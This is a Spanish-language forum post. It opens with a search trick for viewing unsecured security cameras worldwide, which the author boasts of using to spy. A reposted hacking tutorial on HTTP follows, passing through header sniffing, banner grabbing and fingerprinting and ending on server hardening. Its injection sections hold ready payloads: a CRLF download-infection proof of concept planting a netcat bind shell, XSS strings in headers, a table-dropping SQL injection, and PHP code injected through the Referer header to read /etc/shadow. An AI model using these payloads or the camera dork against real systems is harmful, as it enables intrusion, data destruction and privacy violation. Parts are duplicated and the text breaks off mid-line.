celvinturcios
Usuario (Honduras)

Hola Taringueros en esta publicacion les mostrare este fabulozo codigo programado en HTML que le permite ver las camaras de seguridad del cualquier parte del mundo. E Aqui el Famoso Codigo Programado en HTML dijo: view/index.shtml Lo Primero que tenemos que hacer es Colocar el codigo en Google Divirtiéndome un poco aqui pueden observar que espiaba una de mis playas preferidas jeje!! Unete a la Comunidad Tus Descargas, Tus Subidas en La que encontraras Todas tus Desacargas de diferentes Categorias
[-------------Index-------------] 0x01: Introducción al protocolo HTTP /.0x01 Estructura de HTTP y sus cabeceras /.0x02 Metodos HTTP 0x02: Sniffeo y Modificación de Cabeceras 0x03: Inyectando Código /.0x03 CRLF Injecton: Descargas Infectadas (Introducción al HTTP Splitting) /.0x04 XSS & SQL injections /.0x05 PHP injections 0x04: Enumeración a través de HTTP /.0x06 Sacar información con OPTIONS /.0x07 Banner Grabbing /.0x08 Http Fingerprinting 0x05: Contraataques, Evitando la identificación de nuestro servidor 0x06: Ataques con Metodos /.0x9 Creacion y Borrado de ficheros (PUT y DELETE) /.0x10 Authorization 0x07: Links de interés & Despedida [-------------Index-------------] 0x01: Introducción al protocolo HTTP HTTP al descubierto, este es el título de este paper en el que explicaremos el protocolo HTTP y todo lo que abarca este amplio concepto. Como bien han visto el paper se compone de 6 capítulos que ambos autores esperamos que sean suficientes para explicar este gran concepto. Antes de irnos a la práctica y a otras cosas, empezaremos este documento con un par de definiciones breves y cortas para que no tengáis que hacer esfuerzo en memorizarlas. 1º ¿Que es HTTP? HTTP son las siglas de Hipertext Transfer Protocol (en español Protocolo de transferencia de hipertexto) 2º ¿De donde salió HTTP? Cuando la WWW (World Wide Web) se desarrolló, internet se abrio a las puertas de cualquier persona que dispusiera de una computadora. Asi mismo HTTP fue el protocolo creado para realizar todas las operaciones web. 3º ¿Que es HTML? HyperText Markup Language (Lenguaje HiperTexto de Marcado) es el lenguaje de marcado que predomina en el desarrollo web. Es usado para definir la estructura del documento y su respectivo contenido de hipertexto. 4º URL y URI URL significa Uniform Resource Locator (localizador uniforme de recurso). Es un conjunto de Es un conjunto de caracteres, de acuerdo a un formato, que se usa para nombrar recursos URI es Uniform Resource Identifier (identificador uniforme de recurso) definido en este link /.0x01 Estructura de HTTP y sus cabeceras Bien una vez esten las deficiones situadas arriba bien claro vamos a comenzar a sumergirnos en la parte interesante de este paper. Ahora voy a presentar un diagrama explicando el funcionamiento del protocolo HTTP Asi es como trabaja HTTP, TCP/IP hace una petición a la DNS del servidor con el que estemos dialogando actualmente para resolver la Ip de dicho servidor. Se establece la conexión TCP. El navegador envia una petición al servidor (veáse punto /.0x02). El servidor confirma la petición y envia el archivo. Finaliza la conexión. Seguimos ahora con las cabeceras, voy a proceder al análisis de una cabecera HTTP. Realizamos una petición HEAD www.google.es Empezemos, nada más realizar nuestra petición el servidor nos manda el código de respuesta [2] 200. Los códigos de rango 2xx indican que la operación se ha realizado con éxito, y ahora la cabecera [3]: Cache-Control: Genera las directivas que deben ser usadas por cualquier mecanismo a lo largo de la petición/respuesta. Connection: Indica que la conexión se cierra, no se mantiene como en keep-alive Date: Fecha y hora actual Server: Indica el tipo de S.O que corre en el servidor (Vease /.0x07) Content-Length: Campo que indica el tamaño del cuerpo del documento o, en decimal , enviado al destinatario que hubiera enviado la peticion ContenrtType: Tipo de contenido y codificacion del archivo al que realizamos la petición Expires: Muestra la fecha en la que va caducar la cache de nuestra petición. Set-Cookie: Es la coockie que nos envia la pagina a la que hemos realizado la petición, en ella aparece su ID. Su fecha de expiración, sobre que directorio actua y el domio desde donde se ha obtenido. /.0x02 Metodos HTTP Acabamos de llegar a la parte que hay que leer con máxima atención si queremos seguir el tutorial de aquí adelante sin perdernos (sin olvidarnos del snifeo de cabeceras). En esta parte se explicara los metodos HTTP más comunes y los más usados, una vez esto pasaran a ver su aplicación en ataques y tecnicas de PenTesting. Procedo a mostrarles una breve explicacion de cada metodo. GET: El método más usado, GET obtiene cualquier tipo de informacion identificada en el fichero al que realicemos la petición, además la respuesta que obtenemos del servidor (código fuente de dicho archivo) es interpretada por nuestro navegador. HEAD : Junto a Options uno de los que más información útil nos da. El servidor nos devuelve los headers de este mismo, gracias a esto podemos obtener datos como el tipo de web app que esta corriendo, su versión y otra info que veremos más adelante POST : Es usado para pedir que el servidor acepte información enviada desde el cliente. Lo que pase de ahí en adelante es ya tarea de la aplicacion. Ejemplo: Upload echo en php nosotros enviariamos un contenido post de este estilo: -----------------------------19411897685978101991128598558rn Content-Disposition: form-data; name="archivo"; filename="B000063COX.01._SCLZZZZZZZ_.jpg"rn Content-Type: image/jpegrn rn Dicho upload ha admitido la imagen jpg (este upload es vulnerable [4]) OPTIONS: Llegamos al metodo que más información nos da, options nos informa de los metodos de petición y respuesta que admite el servidor, este metodo condiciona lo que vayamos a hacer si estamos intentanto encontrar un fallo en algun servidor o en alguna web app con las tecnicas que veremos posteriormente PUT : El contrario de GET por asi decirlo, si GET lee el source del arhivo, PUT permite modificarlo y sobreescribir el codigo original. DELETE: Su propio nombre lo dice, permite borrar el archivo que especifiquemos. TRACE: El metodo reflejo o espejo, hace que el servidor responda lo mismo que le mandamos 0x02: Sniffeo y Modificación de Cabeceras Hasta ahora hemos hablado en forma general del protocolo HTTP y de que las negociaciones entre cliente-servidor se establecen a través de cabeceras, los HTTP Headers. Para poder trabajar con las cabeceras necesitaremos de una serie de utilidades cuya finalidad es la de interceptar las cabeceras que manda nuestro navegador, para permitir su análisis o su modificación. Estas utilidades se denominan sniffers, y funcionan interceptando el tráfico que pasa por el puerto 80 (HTTP). Estas herramientas pueden venir en forma de Addons o Plugins para diferentes navegadores, de entre los cuales destacan para FireFox, Tamper Data y Live HTTP Headers, o tambien pueden ser programas independientes como el magnífico Achilles. Estas herramientas van a ser el pilar fundamental que sostendrá el trabajo con las cabeceras http. La mayoría de programas que cumplen con esta función, actuan de una forma similar, así que vamos a ejemplificar cómo sniffear y modificar una cabecera utilizando Live HTTP Header (Addon para Firefox), de todas formas les dejamremoss una serie de manuales sobre otros sniffer [5 & 6] Lo primero que deben de hacer es descargarse este addon desde la web oficial de Firefox ( https ://addons.mozilla.org/addon/3829 ) , tras la instalación del addon, procedemos a ejecutarlo desde Herramientas -> Live HTTP Headers. Teniendo el addon cargado podemos dirigirnos a una web cualquiera ( www.google.es) y ver como aparecen una serie de cabeceras que son las que nuestro navegador a mandado. En cada cabecera enviada aparece debajo su respuesta, como aparece en el ejemplo: GET / HTTP/1.1 Host: Pruebas.FoS.Com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive HTTP/1.x 200 OK Server: Microsoft-IIS/5.0 Date: Sat, 06 Sep 2008 21:29:56 GMT X-Powered-By: ASP.NET Content-Length: 35929 Content-Type: text/html Set-Cookie: ASPSESSIONIDSCQRSQTR=JLEIDLOBGDGLKLAMPFDCIOFL; path=/ Cache-Control: private Esta sería la cabecera sniffeada por nuestro Addon, tanto la enviada por nosotros al servidor realizando la petición GET como la cabecera de respuesta del servidor. Ahora bien, si lo que deseamos es modificar dicha cabecera, tendremos que clicar en la cabecera a modificar, y tras esto clicar sobre el botón “Repetir”. Tras esto se nos abrirá un pop-up que permitirá la edición de la cabecera. En este pop-up aparece la petición que en la parte superior la petición que hemos realizado. En ese campo de texto aparecen dos opciones por defecto para editar, o seleccionar GET o POST. Pero, como probablemente esos dos métodos no sean los que vamos a utilizar (puesto que se suele trabajar con otros como HEAD, OPTIONS, PUT y demás), tendremos que clicar sobre la caja de texto y borrar la petición que haya y escribir la que queramos. Al lado de la caja que define el método de la cabecera, tenemos el host al que va a ser dirigido y debajo, los campos a editar de la cabecera. Una cosa muy buena que tiene Live HTTP Headers es que tiene un sistema de medición del número de caracteres automático, lo que hace muy fácil rellenar el campo de Content-Lengt. Tras editar nuestra cabecera (ya observareis en otros capítulos de este paper para qué vamos a editarlas) solamente tendremos que volver a clicar en “Repetir”. Ahora cerramos el pop-up y buscamos entre todas las cabeceras la respuesta del servidor. Cuando tengamos demasiadas cabeceras sniffeadas en pantalla, podemos borrarlas para que continúe sniffeando nuevas cabeceras pulsando “Limpiar”. Existen otras formas de trabajar con las cabeceras sin tener que sniffearlas para modificarlas, como por ejemplo aprovechar algún programa que haga negociaciones TCP, como por ejemplo pueden ser Telnet, Putty, o los populares Netcat y CryptCat. Para mandar una cabecera a un host remoto usando Netcat hay que seguir unos sencillos pasos. GET / HTTP/1.1 Host: Pruebas.FoS.Com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive HTTP/1.x 200 OK Server: Microsoft-IIS/5.0 Date: Sat, 06 Sep 2008 21:29:56 GMT X-Powered-By: ASP.NET Content-Length: 35929 Content-Type: text/html Set-Cookie: ASPSESSIONIDSCQRSQTR=JLEIDLOBGDGLKLAMPFDCIOFL; path=/ Cache-Control: private 1.- Escribimos en nuestro intérprete de comandos (Shell) nc <HOST> 80 (P.E. nc www.google.com 80). 2.- Cuando se conecte, escribimos la cabecera de acuerdo con los estándares para evitar que el servidor nos de una respuesta insatisfactoria. 3.- Pulsamos dos veces enter para señalizar el fin de la cabecera (recordemos que el fin de las cabeceras viene señalizado por dos señales de CR y LF). 4.-Esperamos a que se nos muestre la respuesta del servidor en la pantalla Aquí dejamos una captura de cómo se realiza dicho procedimiento: 0x03: Inyectando Código En el capítulo anterior hemos visto qué es el sniffeo de cabeceras y cómo modificar y enviar cabeceras. Cuando sniffeamos cabeceras podemos hacerlo con dos objetivos, o bien para observar los datos que se envían y de ahí buscar un posible CSRF (Cross Site Request Forguery) o bien para modificar la cabecera y añadirle código malicioso, el cual provoque en una aplicación vulnerable una respuesta que no era la que debía. Una aplicación web es vulnerable cuando maneja datos procedentes de la cabecera sin realizarles un correcto filtrado, permitiendo a un usuario malintencionado la modificación de la cabecera para que la aplicación web maneje códigos maliciosos, y ejecute éstos, de esta forma podemos convertir a las cabeceras como un vehículo en el que inyectar sentencias SQL maliciosas, JavaScript, etc. para realizar diversos ataques a una web. En este capítulo nos centraremos en el ataque a webs a través de la inclusión de código malicioso en las cabeceras. /.0x03 CR/LF Injections (introducción al HTTP Splitting) En este apartado quisiéramos hacer una breve introducción al HTTP Splitting a través de un ejemplo muy llamativo, como es el de infectar una descarga. Pero antes de meternos en el tema necesitamos tener ciertos conocimientos básicos y simples para poder entender cómo funciona la técnica. Existen una serie de caracteres especiales encodados que sirven como señalización. Unos de estos caracteres especiales son los llamados CR (Carriage Return) y LF (Line Feed), los cuales en conjunto son traducidos por “Salto de línea” en el momento en que mandamos una cabecera. Ambas señales se traducen por 0x0D y 0x0A (%0d y %0a). En programación las señales de salto de línea se plasman con los caracteres de escape rn. Consideramos una aplicación vulnerable a CR/LF injection cuando no filtra de forma correcta las variables, permitiendo setear en ellas valores prohibidos como lo son éstos. Esta vulnerabilidad implica el que un usuario malintencionado pueda manipular a su antojo las cabeceras de un servidor, ya que como sabemos, la finalización de una cabecera se señala con un doble salto de línea o %0d%0a%0d%0a. Entonces si un usuario mal intencionado setea una variable con ese código provocará la “partición” de la cabecera, permitiendo colocar junto al doble salto de línea el código que él considere oportuno, normalmente será una segunda cabecera. A la técnica de “truncar” o “cortar” una cabecera para controlar una respuesta del servidor se la denomina “HTTP Splitting”. Una técnica derivada del HTTP Splitting puede ser lo que se denomina “File Download Injection” y consiste en infectar con el código que nosotros deseemos una descarga. Si tenemos una aplicación que descarga ficheros con un código similar a (en PHP): header(”Content-Type: application/octet-stream”); header(”Content-Disposition: attachment; filename=”.$_REQUEST[”file”]); Y además es vulnerable a CR/LF injectión, podemos usar esta aplicación como vector de ataque contra una víctima, ya que como ahora veremos, podemos infectar una descarga con el código que nosotros deseemos. Si nosotros accedemos a una descarga a través de una URL tipo www.mysite.com/descargas.php?file=Batch.bat y analizamos la cabecera (tras sniffearla) podemos ver que quedaría algo tipo: Si nosotros a la variable file, en vez de meter únicamente el archivo que queremos descargar, lo que hacemos es añadirle una señal de doble salto de línea seguida de código, cuando la persona descargue ese archivo, su contenido se habrá sobrescrito por el que nosotros añamos colocado en la URL. Con esto hacemos que la víctima ejecute código malicioso que podría poner en jaque su seguridad, si por ejemplo, lo que añadimos es colocar una shell en un puerto, o borrar X HTTP/1.x 200 OK Date: Mon, 08 Sep 2008 13:59:22 GMT Server: Apache content-disposition: attachment; filename=download.php Si nosotros a la variable file, en vez de meter únicamente el archivo que queremos descargar, lo que hacemos es añadirle una señal de doble salto de línea seguida de código, cuando la persona descargue ese archivo, su contenido se habrá sobrescrito por el que nosotros añamos colocado en la URL. Con esto hacemos que la víctima ejecute código malicioso que podría poner en jaque su seguridad, si por ejemplo, lo que añadimos es colocar una shell en un puerto, o borrar X fichero. Como Prueba de Concepto para ver que realmente funciona, aquí teneis la cabecera resultante de setear la variable FILE con Batch.bat%0d%0a%0d%0anc –l –p 57 –e cmd: HTTP/1.1 200 OK Date: Thu, 27 Mar 2008 05:02:24 GMT Server: Apache Content-Disposition: attachment;filename=troyano.bat nc -l -p 57 -e cmd Como podemos ver, el codigo fuente se ha sobrescrito por una línea cuya función es la de colocar una shell en el puerto 57 de la víctima. Ésta es solo una aplicación de las muchas que conlleva el HTTP Splitting, puesto que su potencial puede ser increíble. Este apartado ha sido una mera introducción a este tipo de ataque para que os pique el gusanillo e investiguéis sobre él, ya que es un tema muy amplio y como no queríamos desviarnos demasiado del tema central del paper apenas lo hemos podido tocar. Ésta es solo una aplicación de las muchas que conlleva el HTTP Splitting, puesto que su potencial puede ser increíble. Este apartado ha sido una mera introducción a este tipo de ataque para que os pique el gusanillo e investiguéis sobre él, ya que es un tema muy amplio y como no queríamos desviarnos demasiado del tema central del paper apenas lo hemos podido tocar. /.0x04 XSS y SQL Injections Probablemente cuando habéis leido el anterior apartado, centrado en las CR/LF injections, habrá sido la primera vez que hayáis visto este tipo de vulnerabilidad. Si este tipo de vulnerabilidad, que podemos etiquetarla como “no muy extendida o conocida”, ahora por el contrario si vamos a tratar las vulnerabilidades más conocidas y extendidas por excelencia: los XSS y las inyecciones SQL. Si recordais el inicio de este capítulo, estuvimos hablando que muchas aplicaciones trabajan con datos extraidos de las cabeceras, y que en la mayoría de los casos dichos datos son utilizados sin pasarle previamente algún tipo de filtro, es inevitable que se nos vengan a la mente nuestro queridísimos amigos Cross Site Scripting y SQL injection. La mayoría de casos la variable vulnerable (en el caso de los XSS) suele ser alguna que se utiliza para mostrar alguna información tipo IP, User-Agent y demás. Es por ello que la mayoría de webs que ofrecen “ver mi IP y otros datos” suelen ser vulnerables, ya que si nosotros sniffeamos y modificamos una cabecera para que quede tipo: Host: www.vermiip.es User-Agent: <script>alert(/FoS TeaM/)</script> Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png, */*;q=0.5 Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: <script>alert(/0wn3d/)</script> Cookie: datos=fecha=09%2F09%2F2008+16%3A40&ip=<script>alert(/Fuck U/)</script>; ASPSESSIONIDSCBTTBBS=CINKKHKCFLKEIONDKCHIPPPC Cache-Control: max-age=0 Damos a repetir… et voilá! Un bonito XSS. Por eso muchos webmaster para “asustar” a posibles “atacantes” o usuarios malintencionados optan por mostrar esos datos, IP, User-Agent y demás, pero lo que no saben es que están poniendo en peligro su propia seguridad. Y más aún cuando muchas veces guardan estos datos en un archivo para visualizarse desde un panel de administración… Entonces sí que estamos de una vulnerabilidad y de las gordas. También muchos sistemas de estadísticas se basan en un sistema de recogida en un archivo los Referer de la gente que entra su website, y con esos datos elaboran listas de links que apuntan a su sitio… Existe una alta probabilidad de que en estos casos también nos encontremos de cara a un posible ataque aprovechando el XSS. Pero, los últimos tiempos se han puesto de moda las gestiones con bases de datos para facilitar y optimizar el trabajo de los webmasters. Pero, las sentencias para usar las DBs (Data Bases) si utilizan variables que proceden de las cabeceras. Un claro ejemplo fue la vulnerabilidad descubierta por SirDarckCat en X-Statistics[5] , aplicación la cual usaba los datos recogidos de User-Agent sin realizar un correcto filtrado, lo que conllevaba a que un usuario malintencionado pudiera introducir sentencias malignas (SQL Injections) dentro de las cabeceras. Otro escenario seria un sistema de baneado a traves de X_FORWARDED_FOR: $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; $consulta = mysql_query( "SELECT * FROM baneados where ip=$ip" , $conexion); En ese código vulnerable, podemos spoofear la cabecera y añadirle una SQL injection con el código foo'; DROP TABLE baneados;--, provocando que se borre la tabla "baneados". Si nos apeteciera jugar más, usando ISERT INTO podriamos añadir la IP del admin para darle un susto y avisarle /.0x05 PHP injections En el apartado superior hemos hablado de como implementar estas dos vulnerabilidades (XSS y SQL injection) usando los metodos HTTP y un Sniffer de cabeceras, ahora vamos a hablar sobre las PHP injections. Algunos no habran oído hablar nunca de este tipo de vulnerabilidad sin embargo tiene grandes similitudes con RFI, aunque ahora explicare la pequeña diferencia entre las dos. Host: www.vermiip.es User-Agent: <script>alert(/FoS TeaM/)</script> Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png, */*;q=0.5 Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: <script>alert(/0wn3d/)</script> Cookie: datos=fecha=09%2F09%2F2008+16%3A40&ip=<script>alert(/Fuck U/)</script>; ASPSESSIONIDSCBTTBBS=CINKKHKCFLKEIONDKCHIPPPC Cache-Control: max-age=0 Con un include() mal filtrado, nosotros lo aprovechamos para inyectar la url de nuestro interprete de comandos (shell), sin embargo las PHP injections consisten en usar la propia aplicacion vulnerable como interprete de comandos, para que esto suceda dentro de dicha aplicacion deve de estar presente la función eval() y el usuario tiene que poder modificar algun parámetro. La forma de prevenir esto es denegar la ejecución de comandos al usuario o en otras palabras que nada dentro de eval() dependa de variables que pueda modifcar el usuario. Bueno ahora voy a pasar a mostrarles como podemos implementar las PHP injections usando las cabeceras y el Live HTTP headers Imaginense que tenemos una web que captura todas las ips de los visitantes y para ello usa algo parecido a esto: <?php $lista = open ("ips.txt", "a"; fwrite ($lista, $_SERVER['HTTP_X_FORWARDED_FOR']); fclose($lista); ?> Y evidentemente otro archivo (index.php por ej.) llamara a esta especie de log, dicho archivo hara un include() a ips.txt, ahora nosotros lo que pretendemos hacer es modificar nuestra cabecera para mandar código php a ips.txt y cuando este fichero sea llamado por index.php sea ejecutado. GET /index.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: UTF-8,* Keep-Alive: 300 Connection: keep-alive Referer: <php ob_clean; system("nano /etc/shadow #ojala"; ?> De esta forma podemos aprovechar la aplicación como si se tratase de una shell. Como pueden comprobar podemos aprovechar para ejecutar comandos habiendo infectado el archvio ips.txt, en nuestro caso hemos intentado visualizar el archivo shadow ovbiamente sin privilegios de root nos podemos ir olvidando, no obstante podemos usar ls para listar el contenido del directorio /.0x06 Sacar información con OPTIONS Ya hemos hablado del metodo OPTIONS en el capítulo /.0x02 pero ahora intentaremos profundizar un poco más y presentar algunas pruebas de concepto. Como bien decíamos en dicho capítulo anterior el método OPTIONS nos informaba de que otros métodos estaban permitidos y cuales no. Aquí os dejo una breve prueba de concepto: Como vemos en el campo Allow, el servidor permite los metodos GET, HEAD, OPTIONS y TRACE. Si hemos leido el capítulo /.0x02 recordaremos que TRACE era el método espejo, existe una tecnica que usa este metodo para conseguir un XSS aunque dudo que en este caso sea posible usarlo. /.0x07 Banner Grabbing Quizas a muchas personas no les suene esta técnica, y a otras simplemente les parezca estúpido, personalmente no estamos de acuerdo con esto, ya que estoforma parte de la etapa de enumeración o reconocimiento para los que pretenden hacer una intrusión a un servidor por medio de vulnerabilidades. No obstante no hay que fiarse al 100% de los banners ya que estos son modificables, para hacer una correcta enumeración del servidor a atacar les recomiendo que lean el siguiente capítulo de este paper. Antes de empezar, me gustaria definir banner, Estamos llamando banner a la informacion (aplicación, versión, plataforma sobre la que corre) que trasmite un servicio cuando trabajamos con él. Aquí un ejemplo de si nos conectaramos al ftp de leetupload.com La parte encuandrada en rojo seria la correspondiente al banner, nos informa de que hay un servicio corriendo en el puerto 21(FTP). Nos iforma tambien que como aplicación utiliza (ProFTD) su versión (1.3.1) y en este caso también el host de la web (DreamHost). Pues sigamos, ahora vamos a poner un breve ejemplo de banner grabbing hacia una web muy conocida, sinceramente podrían ser un poco más discretos pero bueno, eso ya depende de como se tome su tarea el administrador: Y tachán! Miren cuantra información hemos sacado con solo una petición HEAD. Ya sabemos que el servidor utiliza Apache, y su version 1.3.41. También sabemos que corre sobre un sistema operativo basado en Unix. Que usa la versión 5.2.6 de PHP junto a varios mods (log_bytes, bwlimited, auth_passthrough, ssl) y OpenSSL 0.9.8b Quizás estos datos os suenen de algun scaneo que habréis echo con nmap, sin embargo como podréis haber visto hemos ahorrado muchísimo tiempo. Hacer esto de seguido se os puede hacer una tarea algo pesada por ello vamos a dejar varias herramientas que os pueden servir. He aquí una simple tool codeada por vengador, que nos permite obtener la misma información que una petición HEAD. #!/usr/bin/perl # Banner Grabber Example by Vengador de las Sombras (F.O.S TeaM) # Permitida su distribución y editación siempre y cuando guarden créditos # Www.ArgeniversoHack.com.aR || RemoteExecution.orG || 0verl0ad.blogspot.com unless ($ARGV[0]){ &uso } use IO::Socket::INET; $host = $ARGV[0]; $port = $ARGV; $size = "1000"; $peticion = "HEAD / HTTP/1.0"; $peticion .= "rnrn"; #Concatenamos un doble CR/LF para indicar el final del Header print "[+] Conectando con $host ...n"; $socket = new IO::Socket::INET( PeerAddr => $host, PeerPort => $port, Proto => 'tcp') || die "[-] No se ha podido conectar a $host"; print $socket $peticion; #Mandamos la cabecera read $socket, $respuesta, $size; # Leemos la salida del Socket @salida = split(/n/, $respuesta); foreach $linea (@salida){ if ($linea =~ /Server/){ $banner = $linea; }} $_ = $banner; #Con todo esto s/<ADDRESS>*//; #Lo que hacemos es s/</ADDRESS>//; #Limpiar la línea de nuestro banner $banner = $_; #Para que salga únicamente los datos qeu nosotros queremos print "nBanner de $host =>nn $bannernn"; exit(1); sub uso { print "Uso: Banner <<HOST> <PORT>"; exit(0); } #Fin del programa Pero si queremos automatizar más aun nuestra tarea podemos usar un addon muy interesante para el firefox, el Greasemonkey (https://addons.mozilla.org/es-ES/firefox/addon/748). Dado que este no es un tutorial sobre este maravilloso addon no daremos una explicación concreta sobre su uso o que hace para ello pueden ver los links que se dejaran al final del paper [6] Pues bien el script que encontramos estaba echo por C1c4tr1Z // ==UserScript== // @name Deviathan! // @namespace http://www.lowsec.org/ // @description Small HTTPD Banner Grabber // @include * // ==/UserScript== /* This is a small (maybe Proof-of-Concept) HTTP banner grabber. Written by C1c4Tr1Z (http://lab.lowsec.org/). */ if(location.href==top.location){ var div=document.createElement("div"; div.setAttribute("id","centauri"; div.setAttribute("style","font-family:Verdana,Arial,Helvetica,sans-serif;font-size:11px;-mozopacity: 0.8;position:fixed;z-index: 0;top:2%;float:left;left:2%;backgroundcolor:# 000;padding:3px;color:#FFF;border:1px dashed #FFF;"; div.innerHTML="<b style='color:#00749E;'>Deviathan!: </b>"; GM_xmlhttpRequest({ method: 'GET', url: 'http://'+(document.domain)+':80/', headers:{ 'UserAgent':'Mozilla/4.0 (compatible) BannerGrab!' }, onload:function(responseDetails){ if(/Server.*)/i.test(responseDetails.responseHeaders)){ div.innerHTML+="HTTPD Application: "+(RegExp.$1).replace(/(<|>/,'')+"<br/>"; } document.body.appendChild(div); } }); } Y cada vez que visitemos una web con nuestro firefox nos aparecerá una barra de este tipo: /.0x08 Http Fingerprinting Debido a que los banners pueden ser spoofeables para ofuscar a los posibles atacantes, es necesario recurrir a otro tipo de enumeración “más fiable” para poder saber con un 95% de posibilidades ante qué tipo de servidor nos encontramos. Esta técnica es conocida como fingerprinting (huella dactilar) y consiste en la ejecución de 4 tests (orden de campos al hacer un HEAD, respuesta ante un DELETE, respuesta ante una versión del protocolo HTTP incorrecta, y por último, la respuesta que da el servidor ante un protocolo erroneo). Con los resultados de los mencionados cuatro tests, podremos diferenciar perfectamente entre servidores Apache y los IIS, ya que de cada uno se extrae un resultado diferente ante cada uno de los tests. El primer test consiste en analizar una cabecera respuesta ante una petición de tipo HEAD al servidor. Entre la respuesta que da un Apache y un ISS existen ciertas diferencias que se observan de forma muy directa al comparar dos cabeceras: Apache: HTTP/1.1 200 OK Date: Wed, 10 Sep 2008 14:41:01 GMT Server: Apache Last-Modified: Wed, 30 Jul 2008 19:10:35 GMT ETag: "abe0d-13a-4534282d840c0" Accept-Ranges: bytes Content-Length: 314 Connection: close Content-Type: text/html IIS: Podemos ver como en las cabeceras de respuesta de los servidores Apache, la información primera que aparece es DATE, es decir la fecha, y debajo de ésta el banner. Omitimos el banner dentro de las pruebas de fingerprinting porque como ya hemos dicho con anterioridad, pueden estar spoofeados. A diferencia de Apache, los servidores que corren con IIS, muestran como primera información el banner, mientras que el campo Date queda en posiciones inferiores. Con esta primera prueba ya podríamos vislumbrar ante qué servidor nos encontramos… pero ante la duda es siempre preferible aplicar los otros tres tests. El segundo tests se aprovecha de la respuesta de los servidores ante un método prohibido (en la mayoría de los casos) como puede ser DELETE. Apache y IIS reaccionan ante una petición DELETE de formas distintas, ya que mientras que Apache responde con un error 405 (Method not Allowed), IIS lo hace con un 403 (Forbidden). El siguiente consisten en mandar una petición (un GET por ejemplo) colocando una versión inexistente de HTTP (3.0, 5.2, etc) para ver qué reacción toma el servidor: Apache: HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET Content-Location: http://200.49.155.214/index.html Date: Wed, 10 Sep 2008 14:39:53 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Thu, 06 Dec 2007 03:28:15 GMT ETag: "eab1b49b837c81:1669" Content-Length: 66 IIS: Podemos ver como la respuesta de un servidor Apache es un error 400 por mala petición (Bad Request). Por el contrario, los servidores IIS responden con un código de OK (200) admitiendo este error de versión de protocolo. La reacción se invierte cuando la petición en vez de contener un error en la versión lo contiene en el protocolo en sí, es decir, en vez de poner HTTP/1.X ponemos otras cosas como FOS/1.X: Apache: HTTP/1.1 200 OK Date: Sun, 15 Jun 2003 17:17:47 GMT Server: Apache/1.3.23 Last-Modified: Thu, 27 Feb 2003 03:48:19 GMT ETag: "32417-c4-3e5d8a83" Accept-Ranges: bytes Content-Length: 196 Connection: close Content-Type: text/html IIS: HTTP/1.1 400 Bad Request Server: Microsoft-IIS/5.0 Date: Thu, 11 Sep 2008 09:38:07 GMT Content-Type: text/html Content-Length: 87 Como vemos, Apache responde un 200 mientras que IIS un error 400. A la luz de los resultados obtenidos tras realizar esta serie de tests, podemos diferenciar con alto porcentaje de acierto ante qué tipo de servidor nos enfrentamos. Esta técnica debemos de emplearla en la etapa de la enumeración, ya que si durante una auditoría de seguridad o cuando vamos a “asaltar” un servidor, es necesario poder focalizar lo máximo posible nuestra acción, es decir, podremos probar a explotar vulnerabilidades exclusivas de ese tipo de servidor y descartar otras técnicas de ataque. 0x05: Contraataques, Evitando la identificación de nuestro servidor Como dice el títutlo del capítulo hemos llegado a la parte del contraataque, siempre es bueno aprender a hacer algo, pero también es esencial saber como se ha echo y como deshacerlo. Así mismo esta vez hemos aprendido a utilizar tecnicas como Banner Grabbing y Http Fingerprinting pero también vamos a aprender a protegernos de ambas. Comenzaremos con la protección ante banners grabs dado que es la técnica más sencilla de las dos que hemos mencionado anteriormente. Existen 3 maneras de evitar el banner grab en Apache, la primera editando un fichero de apache antes de instalarlo, y las otras dos mediante mods de este mismo. Sin embargo solo mostraré 2. Una vez bajado y descomprimido nuestro apache abrimos la carpeta include y localizamos el archivo ap_release.h dentro de este buscamos algo como esto: #define AP_SERVER_BASEVENDOR "Apache Software Foundation" #define AP_SERVER_BASEPROJECT "Apache HTTP Server" #define AP_SERVER_BASEPRODUCT "Apache" #define AP_SERVER_MAJORVERSION_NUMBER 1 #define AP_SERVER_MINORVERSION_NUMBER 3 #define AP_SERVER_PATCHLEVEL_NUMBER 41 #define AP_SERVER_DEVBUILD_BOOLEAN 0 Este archivo define los datos de la versión, producto etc... Entonces ahora vamos a proceder a modificarlo. #define AP_SERVER_BASEVENDOR "Tito Lix Server fundation” #define AP_SERVER_BASEPROJECT "Knight Force HTTP Server" #define AP_SERVER_BASEPRODUCT "Knight" #define AP_SERVER_MAJORVERSION_NUMBER 2 #define 